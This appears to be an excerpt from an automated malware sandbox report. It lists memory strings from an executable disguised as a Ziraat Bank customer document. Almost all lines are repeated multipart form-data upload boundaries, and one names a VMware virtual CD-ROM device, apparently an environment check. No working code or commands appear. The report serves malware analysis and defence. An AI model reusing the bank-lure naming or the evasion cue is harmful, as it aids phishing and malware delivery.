          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd1749e1d9f2d8<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce1dc7362965d
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcfa9be8e3d3a4
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce539c2d259b7
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcefe818514343
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd209f198ce1ba<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd120b60779b87<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce997aaaad947
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd314fd3a84e94<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd15016b1ea21c<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcfb71bb175392
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd17df79de90e0<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd28221ff8370a<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd30a110097438<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd06087186fd40<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd01a2be2e504b
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2e1cdf96e4e5<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0ad8215b06bb<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcef7eb6b6afe8
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd03130094d087
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd179fe028ee6b<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf570fe652fbf
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2e6e4e5efeba<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd13ad63271467<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd184510fb928c<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce2227de71c1c
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd21ea63fb68b5<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf09d185123c2
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd10546c775586<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd25a234bda77d<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd144bd6ecd266<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd32ed8188ef90<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd08fbf92642ae<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0b4a4b3f4a98<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcfc5dd9d17be4
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0bb3f9b747b0<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf03db3dd61da
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd149eedb82b6c<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2fedc67efc9a<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf4c10f13b819
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0426a2e8f167
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce18fe168c18d
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dceedce971c962
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1739949343.0000000000A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\`
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce717b031d71a
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2b66a646ef5e<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0477f2d17d84
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcecbe03532505
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd255075071724<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2027b47c0eb6<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd05245e6271d3<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd038bba82bd16
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0ffe117a5e37<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf2b3164b9386
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce6cd32a6800f
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd27c57fab271e<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd066f4ea4de0b<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf0f40df942c2
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd30e405b75cd1<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce687bb2f29e9
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0567912c48b5<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce5811bb32d74
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd32981e727536<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd31964ffbcd94<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf5c1e974e0c1
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd13514572cb14<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf8990a312940
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf95a72979d06
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd233ff480d1da<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd011f8a276c68
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd04cd8c845f88<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd1d2dde54b38a<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd026a531c5b05
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2c6ca5788953<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcfa4a489d1784
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd02be3a529e52
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcea5fe505953c
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd323ab1ca858b<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce88f1653b672
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf9ac59ba2b7b
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd16f86a2bc2cd<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2d717dba3193<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd20f886ea4178<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcfaebff733d3c
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd219aca851858<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd11bbbd263db8<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd01f3f5b901aa
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd31e95a6b71cc<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce9e1bd959ccb
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf7ea90d9cc3d
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2d1fca514654<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce14d1e5270b0
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce5eb8eeed2ce
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcfbbbebbd6c73
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce115816465e3
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0dfe7e0ed492<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce4f2bfc426b2
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2fa3ef5c2ea3<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce1ff7f595632
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd14025a1c1cdc<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2cc6e02204b6<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2149b2ae10d0<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf51324ab0cc4
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf9086c9c212b
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce94c299a6585
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce1b6d4f6292d
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0a4f7852c7fd<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0cb1bc016dad<
